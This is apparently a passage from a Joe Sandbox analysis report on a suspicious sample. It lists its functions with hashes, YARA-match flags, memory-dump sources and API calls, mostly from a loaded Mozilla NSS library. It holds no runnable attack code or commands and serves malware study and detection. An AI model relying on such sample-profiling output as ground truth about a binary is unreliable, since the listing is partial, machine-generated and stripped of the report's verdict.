                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Alloc_ArenaUtil
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2062749931-0
                                                                                                                                              • Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
                                                                                                                                              • Instruction ID: 1717a678c4c46101321808d0a9c9e1a279c1c434ca58c45f6b143910b651e5cc
                                                                                                                                              • Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
                                                                                                                                              • Instruction Fuzzy Hash: 2971F272E117098FE718CF19CA8066AB7F2EB88304F54462DD85697B91DF39E910CB90
                                                                                                                                              Function 6C694DB0 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: winUnlockReadLock
                                                                                                                                              • API String ID: 0-4244601998
                                                                                                                                              • Opcode ID: ebaa2e94088d78c8c80073dc0fdb097ced412401b0e2d28aaf53b5172db32116
                                                                                                                                              • Instruction ID: 826559f2a9d25413419ee12995902eb41e3c7a11193af4ccc0ae7207644daf12
                                                                                                                                              • Opcode Fuzzy Hash: ebaa2e94088d78c8c80073dc0fdb097ced412401b0e2d28aaf53b5172db32116
                                                                                                                                              • Instruction Fuzzy Hash: 1AE14A70A083418FDB54DF29D88466ABBF0FFCA308F51862DF89997251E7749985CBC2
                                                                                                                                              Function 00418CF0 Relevance: 1.6, APIs: 1, Instructions: 60timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                              • GetSystemTime.KERNEL32(?,0099BC18,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: SystemTimelstrcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 62757014-0
                                                                                                                                              • Opcode ID: cce225ff94706f9395c058c90c0b5c4f8768ee8627e86dd20290b192b3a29a40
                                                                                                                                              • Instruction ID: 470bfa94025adedc24e37c5607c38d4270d2eadb7b78e810e6eac55b0552b998
                                                                                                                                              • Opcode Fuzzy Hash: cce225ff94706f9395c058c90c0b5c4f8768ee8627e86dd20290b192b3a29a40
                                                                                                                                              • Instruction Fuzzy Hash: 1211D331D011089FCB04EFA9D891AEE77BAEF58314F44C05EF41667185EF386984CBA6
                                                                                                                                              Function 0041D21A Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001D1D8), ref: 0041D21F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                              • Opcode ID: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                                                                                                                              • Instruction ID: 17ba3a89fab13532ca0ccd526d59b343203315732a49a137553a0870c120f9dd
                                                                                                                                              • Opcode Fuzzy Hash: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                                                                                                                              • Instruction Fuzzy Hash: B19002F465151096860457755C4D5857A905E8D64675185A1AC06D4054DBA840409529
                                                                                                                                              Function 6C7CDCD0 Relevance: .4, Instructions: 371COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 83c65b7ca4f8bf9a2a7c430f11555ce316c27f9fa4e20194675d3d72cea7ae65
                                                                                                                                              • Instruction ID: 43133cb5014ca07440ca977e0e8e27a4ac72752b04fd630fb5eafcf2f53bb965
                                                                                                                                              • Opcode Fuzzy Hash: 83c65b7ca4f8bf9a2a7c430f11555ce316c27f9fa4e20194675d3d72cea7ae65
                                                                                                                                              • Instruction Fuzzy Hash: CFF16B71B012068FDB08CF19C994BAA77B2BF89318F294178D8599B741CB35ED42CBD6
                                                                                                                                              Function 6C761DC0 Relevance: .3, Instructions: 345COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
                                                                                                                                              • Instruction ID: 53225a7b55ee110dae0b0959cd24f43606579e3e8c6751d98791ff9f608d4b57
                                                                                                                                              • Opcode Fuzzy Hash: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
                                                                                                                                              • Instruction Fuzzy Hash: CBD15832E096568BDB518E19C9883DA7763AB85328F1D8328CC646BFC6C37BD905C7D0
                                                                                                                                              Function 6C7D0C40 Relevance: .1, Instructions: 55COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8270500a4d13d0788092da27e000c401982113a0db392efca0c4a3888b01cffb
                                                                                                                                              • Instruction ID: 7611a9fb2afe6f60a53a9659bab54f9304f44d0e65880126670835a006925ae8
                                                                                                                                              • Opcode Fuzzy Hash: 8270500a4d13d0788092da27e000c401982113a0db392efca0c4a3888b01cffb
                                                                                                                                              • Instruction Fuzzy Hash: 4B11CE787043458FCB10DF28D8846AA7BA2FF85368F14807DD8198B701DB71E806CBA4
                                                                                                                                              Function 6C7D0D60 Relevance: .0, Instructions: 26COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                                                              • Instruction ID: 46a34d47090a901f2c604abb865012d1dc264d9dca7e274dea12d43a830c5657
                                                                                                                                              • Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                                                              • Instruction Fuzzy Hash: 16E0923A202054A7DB148E09D555AA97359DF81619FB6907FCC5D9FA01D733F8038781
                                                                                                                                              Function 00419AA0 Relevance: .0, Instructions: 15COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                                                                                                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                                                                                                                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                                                                                                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                                                                                                                              Function 6C731D60 Relevance: 84.2, APIs: 1, Strings: 47, Instructions: 210COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_LogPrint.NSS3( rv = %s,CKR_FUNCTION_REJECTED,?,6C731D46), ref: 6C732345
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Print
                                                                                                                                              • String ID: rv = %s$ rv = 0x%x$CKR_BUFFER_TOO_SMALL$CKR_CRYPTOKI_ALREADY_INITIALIZED$CKR_CRYPTOKI_NOT_INITIALIZED$CKR_CURVE_NOT_SUPPORTED$CKR_DEVICE_ERROR$CKR_DEVICE_MEMORY$CKR_DEVICE_REMOVED$CKR_DOMAIN_PARAMS_INVALID$CKR_ENCRYPTED_DATA_INVALID$CKR_ENCRYPTED_DATA_LEN_RANGE$CKR_FUNCTION_CANCELED$CKR_FUNCTION_NOT_PARALLEL$CKR_FUNCTION_REJECTED$CKR_INFORMATION_SENSITIVE$CKR_MUTEX_BAD$CKR_MUTEX_NOT_LOCKED$CKR_NEW_PIN_MODE$CKR_NEXT_OTP$CKR_OBJECT_HANDLE_INVALID$CKR_OK$CKR_OPERATION_ACTIVE$CKR_OPERATION_CANCEL_FAILED$CKR_OPERATION_NOT_INITIALIZED$CKR_PIN_EXPIRED$CKR_PIN_INCORRECT$CKR_PIN_INVALID$CKR_PIN_LEN_RANGE$CKR_PIN_LOCKED$CKR_RANDOM_NO_RNG$CKR_RANDOM_SEED_NOT_SUPPORTED$CKR_SAVED_STATE_INVALID$CKR_SIGNATURE_INVALID$CKR_SIGNATURE_LEN_RANGE$CKR_STATE_UNSAVEABLE$CKR_TEMPLATE_INCOMPLETE$CKR_TEMPLATE_INCONSISTENT$CKR_TOKEN_NOT_PRESENT$CKR_TOKEN_NOT_RECOGNIZED$CKR_TOKEN_RESOURCE_EXCEEDED$CKR_TOKEN_WRITE_PROTECTED$CKR_WRAPPED_KEY_INVALID$CKR_WRAPPED_KEY_LEN_RANGE$CKR_WRAPPING_KEY_HANDLE_INVALID$CKR_WRAPPING_KEY_SIZE_RANGE$CKR_WRAPPING_KEY_TYPE_INCONSISTENT
                                                                                                                                              • API String ID: 3558298466-1980531169
                                                                                                                                              • Opcode ID: 2c70205694d0fb8287f33a46dda1639a4a00d3983633f6d33a2a73d2ca963089
                                                                                                                                              • Instruction ID: d50a36ba4a699c05d4cc1004e740b8d89991a10af9cbf3d31047de330408f04a
                                                                                                                                              • Opcode Fuzzy Hash: 2c70205694d0fb8287f33a46dda1639a4a00d3983633f6d33a2a73d2ca963089
                                                                                                                                              • Instruction Fuzzy Hash: 0261133068E178C7D63C444C876D36C22249753305FA8F97BE78E8EE93D666CA4946D3
                                                                                                                                              Function 6C765DE0 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 272COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6C765E08
                                                                                                                                              • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C765E3F
                                                                                                                                              • PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6C765E5C
                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C765E7E
                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C765E97
                                                                                                                                              • PORT_Strdup_Util.NSS3(secmod.db), ref: 6C765EA5
                                                                                                                                              • _NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6C765EBB
                                                                                                                                              • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C765ECB
                                                                                                                                              • PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6C765EF0
                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C765F12
                                                                                                                                              • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C765F35
                                                                                                                                              • PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6C765F5B
                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C765F82
                                                                                                                                              • PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6C765FA3
                                                                                                                                              • PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6C765FB7
                                                                                                                                              • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C765FC4
                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C765FDB
                                                                                                                                              • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C765FE9
                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C765FFE
                                                                                                                                              • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C76600C
                                                                                                                                              • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C766027
                                                                                                                                              • PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6C76605A
                                                                                                                                              • PR_smprintf.NSS3(6C83AAF9,00000000), ref: 6C76606A
                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C76607C
                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C76609A
                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C7660B2
                                                                                                                                              • free.MOZGLUE(?), ref: 6C7660CE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
                                                                                                                                              • String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
                                                                                                                                              • API String ID: 1427204090-154007103
                                                                                                                                              • Opcode ID: 0e47bf9a4df5924d9bb5fdd9432f2a69db1109b8ef3d9039a5425ab00acc8985
                                                                                                                                              • Instruction ID: ac926977577535b8a902f06a6bc4cd8e4e7980bf39ae0864e080f4ff4717480f
                                                                                                                                              • Opcode Fuzzy Hash: 0e47bf9a4df5924d9bb5fdd9432f2a69db1109b8ef3d9039a5425ab00acc8985
                                                                                                                                              • Instruction Fuzzy Hash: 829104F4A042115BEF518F66EE85BAA3BA8AF0634CF480470EC559BF43E735D904D7A2
                                                                                                                                              Function 6C6F1D90 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 182filestringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_NewLock.NSS3 ref: 6C6F1DA3
                                                                                                                                                • Part of subcall function 6C7C98D0: calloc.MOZGLUE(00000001,00000084,6C6F0936,00000001,?,6C6F102C), ref: 6C7C98E5
                                                                                                                                              • PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6C6F1DB2
                                                                                                                                                • Part of subcall function 6C6F1240: TlsGetValue.KERNEL32(00000040,?,6C6F116C,NSPR_LOG_MODULES), ref: 6C6F1267
                                                                                                                                                • Part of subcall function 6C6F1240: EnterCriticalSection.KERNEL32(?,?,?,6C6F116C,NSPR_LOG_MODULES), ref: 6C6F127C
                                                                                                                                                • Part of subcall function 6C6F1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C6F116C,NSPR_LOG_MODULES), ref: 6C6F1291
                                                                                                                                                • Part of subcall function 6C6F1240: PR_Unlock.NSS3(?,?,?,?,6C6F116C,NSPR_LOG_MODULES), ref: 6C6F12A0
                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6F1DD8
                                                                                                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6C6F1E4F
                                                                                                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6C6F1EA4
                                                                                                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6C6F1ECD
                                                                                                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6C6F1EEF
                                                                                                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6C6F1F17
                                                                                                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C6F1F34
                                                                                                                                              • PR_SetLogBuffering.NSS3(00004000), ref: 6C6F1F61
                                                                                                                                              • PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6C6F1F6E
                                                                                                                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C6F1F83
                                                                                                                                              • PR_SetLogFile.NSS3(00000000), ref: 6C6F1FA2
                                                                                                                                              • PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6C6F1FB8
                                                                                                                                              • OutputDebugStringA.KERNEL32(00000000), ref: 6C6F1FCB
                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C6F1FD2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
